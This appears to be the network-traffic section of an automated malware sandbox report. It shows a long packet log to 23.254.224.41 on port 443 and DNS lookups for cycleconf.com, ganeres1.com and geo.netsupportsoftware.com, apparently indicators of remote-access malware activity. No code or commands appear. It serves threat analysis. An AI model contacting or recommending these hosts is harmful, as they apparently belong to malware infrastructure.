                                                                                                          Dec 10, 2024 08:58:27.632808924 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.632875919 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.636034966 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.636113882 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.640324116 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.640396118 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.643155098 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.643233061 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.647480965 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.647552013 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.650707006 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.650784016 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.654124975 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.654190063 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.657407999 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.657474041 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.661669970 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.661745071 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.796505928 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.796590090 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.799386024 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.799448013 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.803332090 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.803400993 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.806566954 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.806653023 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.810165882 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.810230970 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.812787056 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.812856913 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.817163944 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.817230940 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.820031881 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.820096016 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.823184967 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.823256969 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.826383114 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.826440096 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.829885960 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.829946995 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.833086014 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.833157063 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.836404085 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.836486101 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.840178967 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.840254068 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.843697071 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.843786001 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.847131968 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.847199917 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.850512981 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.850584984 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.990381002 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.990458012 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.993390083 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.993459940 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.997419119 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.997499943 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.000689030 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.000771999 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.003748894 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.003824949 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.007721901 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.007792950 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.010849953 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.010935068 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.014188051 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.014271975 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.017209053 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.017287970 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.021115065 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.021213055 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.023922920 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.023996115 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.027857065 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.027934074 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.031064987 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.031145096 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.034214973 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.034292936 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.038191080 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.038269043 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.041249990 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.041328907 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.181497097 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.181601048 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.184632063 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.184699059 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.188702106 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.188782930 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.191668034 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.191749096 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.194905043 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.194984913 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.198903084 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.198988914 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.201997042 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.202073097 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.205517054 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.205599070 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.208343029 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.208444118 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.212332010 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.212431908 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.215081930 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.215164900 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.219052076 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.219137907 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.222143888 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.222228050 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.225375891 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.225454092 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.229425907 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.229526043 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.232527018 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.232609987 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.428431034 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.428512096 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.548589945 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.548687935 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.639727116 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.639817953 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.640151024 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.640197992 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.640211105 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.640223026 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.640258074 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.640281916 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.640937090 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.641026974 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.641036034 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.641088963 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.641870975 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.641937971 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.642246962 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.642304897 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.642369032 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.642433882 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.643280983 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.643325090 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.643345118 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.643352985 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.643379927 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.643399000 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.644196033 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.644238949 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:28.644253969 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:28.644260883 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.013535023 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.032028913 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.032145977 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.064472914 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.064575911 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.139825106 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.139925957 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.154545069 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.154637098 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.164884090 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.164966106 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.174607992 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.174678087 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.184283972 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.184339046 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.194327116 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.194396019 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.199851036 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.199927092 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.206317902 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.206382036 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.211841106 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.211903095 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.217524052 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.217592001 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.224874973 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.224951029 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.331808090 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.331921101 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.337827921 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.337903023 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.342914104 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.343004942 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.347873926 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.347975969 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.352387905 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.352474928 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.358439922 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.358525038 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.363145113 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.363253117 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.367762089 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.367866039 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.373745918 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.373815060 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.377767086 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.377866983 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.383769035 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.383876085 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.388343096 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.388443947 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.393105030 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.393208027 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.397677898 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.397742987 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.403711081 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.403824091 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.408443928 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.408509016 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.524070978 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.524188995 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.528819084 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.528886080 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.532983065 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.533047915 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.537395954 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.537494898 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.540184021 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.540249109 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.543898106 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.543989897 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.547578096 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.547673941 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.552330017 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.552427053 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.556284904 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.556351900 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.560254097 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.560316086 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.563937902 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.564032078 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.567998886 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.568063974 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.572432995 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.572496891 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.576121092 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.576215982 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.579859972 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.579921961 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.583551884 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.583643913 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.714862108 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.714997053 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.718214989 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.718292952 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.721760035 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.721858025 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.725291967 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.725358009 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.729629993 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.729693890 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.733189106 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.733268976 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.736627102 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.736700058 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.741054058 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.741128922 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.744491100 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.744556904 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.748450041 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.748507977 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.751898050 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.751967907 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.755424023 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.755481958 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.758860111 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.758949041 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.765029907 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.765091896 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.766885042 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.766948938 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.775867939 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.775938034 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.905884981 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.906061888 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.908607006 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.908674002 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.913096905 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.913300991 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.916515112 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.916588068 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.920070887 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.920141935 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.924500942 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.924587965 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.928371906 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.928442955 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.931441069 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.931526899 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.934871912 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.934946060 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.939335108 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.939408064 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.942316055 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.942378998 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.946754932 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.946811914 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.950144053 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.950203896 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.953686953 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.953752041 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.958158016 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.958214998 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.961730957 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.961803913 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:34.965235949 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:34.965302944 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:35.099853992 CET4434985723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:35.099924088 CET49857443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:35.104358912 CET4434985723.254.224.41192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 10, 2024 08:58:22.034070015 CET | 61541 | 53 | 192.168.2.5 | 1.1.1.1
Dec 10, 2024 08:58:22.262923956 CET | 53 | 61541 | 1.1.1.1 | 192.168.2.5
Dec 10, 2024 08:58:35.666821003 CET | 57428 | 53 | 192.168.2.5 | 1.1.1.1
Dec 10, 2024 08:58:35.804672956 CET | 53 | 57428 | 1.1.1.1 | 192.168.2.5
Dec 10, 2024 08:58:35.891145945 CET | 58296 | 53 | 192.168.2.5 | 1.1.1.1
Dec 10, 2024 08:58:36.028695107 CET | 53 | 58296 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 10, 2024 08:58:22.034070015 CET | 192.168.2.5 | 1.1.1.1 | 0x9e4d | Standard query (0) | cycleconf.com | A (IP address) | IN (0x0001) | false
Dec 10, 2024 08:58:35.666821003 CET | 192.168.2.5 | 1.1.1.1 | 0x718b | Standard query (0) | ganeres1.com | A (IP address) | IN (0x0001) | false
Dec 10, 2024 08:58:35.891145945 CET | 192.168.2.5 | 1.1.1.1 | 0x35b2 | Standard query (0) | geo.netsupportsoftware.com | A (IP address) | IN (0x0001) | false
